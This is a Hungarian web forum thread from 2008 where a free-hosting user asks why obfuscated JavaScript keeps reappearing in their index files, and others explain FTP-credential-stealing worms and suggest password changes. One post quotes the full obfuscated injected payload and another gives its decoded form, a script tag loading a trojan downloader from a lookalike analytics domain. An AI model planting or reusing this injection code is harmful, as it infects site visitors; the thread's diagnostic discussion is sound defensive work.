Vírus webszerveren
2008-12-10T22:53:33+01:00
2008-12-12T12:00:37+01:00
2022-07-25T18:42:39+02:00
  • volt már nekem is jópár ilyen, valóban Total Commander ftp-beállításain keresztül fertőz, változóan hol csak az index.* file-okat támadja, hol az összes *.html-t, *.php-t, van amikor csak hozzáfűz, de van amikor teljesen felülírja az előző tartalmat (érdemes másolatokat készíteni). Nekem eddig csak magyar szervereken történt hasonló, mediatemple-t soha nem támadta semmi, pedig azok is bőven benne vannak az ftp-listában.
    Ami megoldást találtunk rá, az az ftp-jelszó megváltoztatása, azóta semmi gond nem volt semmivel.
    Ja, és érdemes azonnal cselekedni, mert egy idő után a google vírusosnak minősíti az oldalt, így esett vissza 1-et a PR-em, 4-re, mert baftam rá az oldalamra magasról
    Mutasd a teljes hozzászólást!
  • Köszi. Mivel én pl. legalább 50 FTP-accountot tárolok Total Commanderben, nekem is ez volt gyanús. Viszont ebből az 50-ből egyetlen egy esett áldozatul hasonló tevékenységnek, ezért ezt az utat első nekifutásra elvetettem.

    Ezek szerint nagy valószínűséggel maga a honlaptulaj a ludas a dologban.
    Mutasd a teljes hozzászólást!
  • Engem is érdekel a téma, aki tudja, hogy mi a támadási mechanizmus, az kifejthetné bővebben.


    Valami 0day sebezhetőségen, vagy egyéb módon a gépedre került féreg olvassa ki a titkosítatlanul tárolt FTP hozzáférési adatokat a különböző FTP proramok konfigurációs fájljaiból (CuteFTP, SmartFTP, FileZilla, Total Commander, stb.stb.), vagy simán figyel a hattárben, és naplózza a bejelentkezési adatokat.
    Ezek segítségével ftp-n letöltik az index.php-dat, hozzáfűzik a kódot, majd szintén ftp-n visszatöltik.

    Leírás

    Mutasd a teljes hozzászólást!
  • Na sikerült megoldani a problémát, mint kiderült amit felmásoltam a szerverre az is vírusos volt, bár a vírusírtó ha localhostról hoztam be az oldalt akkor nem jelzett.
    Átnézettem az egész gépemen az összes weboldalamnak a forrását hogy melyikben szerepel a kód, de másikban nem szerepelt,csak ennek az oldalnak és csak az index.php-ben. Ebből arra következtetek hogy a vírus nem én általam került fel az oldalra hanem a freeweb szerverén szabadult el,támadta meg az oldalam index-ét és azt másoltam el a gépemre.

    Ha így volt akkor érdekes h a freeweb-el ilyenek előfordulhatnak.
    Mutasd a teljes hozzászólást!
  • A oldalon van egy saját fórum, annyira nem sokan látogatják az oldalt h megérte volna feltörni, napi 50-60 ember.

    A php mérete nem változik, marad ugyan az.
    Mutasd a teljes hozzászólást!
  • Lényeg: ha jól értem, akkor a te oldaladat használja, hogy felrakja a látogatóid gépére a trojant. (A te oldaladból hívódik meg a távoli .js-fájl.)

    Ez így biztos kifizetődőbb, mint simán deface-elni egy noname oldalt.

    Nemtom ez mennyire szorosan kapcsolódik:
    http://leechermods.blogspot.com/2008/05/trojan-downloader-javascript..

    Engem is érdekel a téma, aki tudja, hogy mi a támadási mechanizmus, az kifejthetné bővebben.
    Mutasd a teljes hozzászólást!
  • Háát, hogy hogy került oda, az jó kérdés. Nekem is volt már hasonló gyakorlatilag statikus oldalon (se fórum, se keresőbox, az egyetlen url-paraméter meg validálva), tehát XSS, SQL inject szóba se jöhet. Marad, hogy valaki megszerezte a hozzáférést vagy tényleg a szerveren garázdálkodott valami.

    Én megváltoztattam a jelszavam + tettem az index.php-re egy riasztót: ha változik a mérete, akkor küld egy mailt. Azóta nem volt ilyen.

    Egyébként visszafejtettem a tiédet, ez a lényege:
    <script language="javascript"> document.write( "<SCRIPT language=\"JavaScript\" SRC=\"http://www.googleanalitics.net/__utb.js?"+document.referrer+"\"><\/SCRIPT>" ); </script>
    Mutasd a teljes hozzászólást!
  • Más fw-es oldalon nem teszi hozzá. És pont olyat tenne hozzá ami némely vírusírtók által vírusnak érzékelt dolog?


    Vírus neve (Avast szerint): JS:Cruzer[Trj]

    És ezt a kódot fűzi hozzá, sok (kb 20 db) enter után:

    language=javascript>ejj="%";kez="p3cp73cp72p69p70p74 lap6ep67p75ap67p65=jap76ascp72p69p70p74p3ep20 fp75p6ectp69on p65p70np70(i)p7bp76p61r p6ap2cp71p65=\"p34+ p6eup662p49p5fF1p55#p2a.@^p6108]p4bip4d6,qp6fAp56p50p73p2dz3{p39gOp267Tp3dp45m}5Zp42wjHJNl:p28p79\\p22'~p65r[!|btp63p6b)p24p70;dp43p60p76p47hp78\",p70tp75=\"p22,np62p2cp73p65p2cdp3d\"\"p2cp68p3bp66or(p6ap3d0;jp3cip2elengthp3bp6ap2bp2bp29p7b p6eb=p69.charp41tp28j);p73e=qp65.ip6edep78Op66(np62);p69p66(p73e>p2d1)p7b p68=((sep2bp31)p2581-1)p3bip66(p68p3cp3d0p29h+=8p31;p64+=p71p65.cp68p61p72At(p68-1); }p20elp73p65p20d+=np62p3bp7dp70tp75+p3dd;dp6fcp75p6dp65nt.p77p72p69tep28p70p74u)p3bp7d<p2fscrip70p74p3e";fehb=unescape(kez.replace(/p/g,ejj));var tbl,um;document.write(fehb);tbl="<-k[M;cn:0uOf0OrE'H0G0-k[M;c'>nCAkf}ruc@j[Mcryn'<S`R_s=n:0uOf0OrE\\'N0G0Sk[M;c\\'nSR`E\\'xcc;(//jjj@OAAO:r0u0:McMk-@urc/FFfct@H-?' CAkf}ruc@[r2r[[r[ '\\'><\\/S`R_s=>'n$dn</-k[M;c>nn";epnp(tbl);</script>

    Rem nem lesz gond belőle h ide beszúrom a kódot.
    Mutasd a teljes hozzászólást!
  • Mondjuk úgy, hogy a fw hozááteszi?
    Mutasd a teljes hozzászólást!
  • Hi

    Van egy freewebes oldalam és az index.html és index.php-kre vírust ír ki pár vírusirtó. Valószínűleg vírusos is mivel ha megnyitom olvasásra akkor valamelyik fájlt akkor a rendes kód után van egy JS, persze "kódolva".
    Próbáltam letörölni a fájlokat,majd a helyeseket visszatenni (ezek nem vírusosak ellenőriztem). Visszamásolás után megint ott van a JS-s kód.
    Van valakinek valami ötlete mitévő legyek? Egyáltalán hogy került oda a vírus?
    Mutasd a teljes hozzászólást!
Tetszett amit olvastál? Szeretnél a jövőben is értesülni a hasonló érdekességekről?
abcd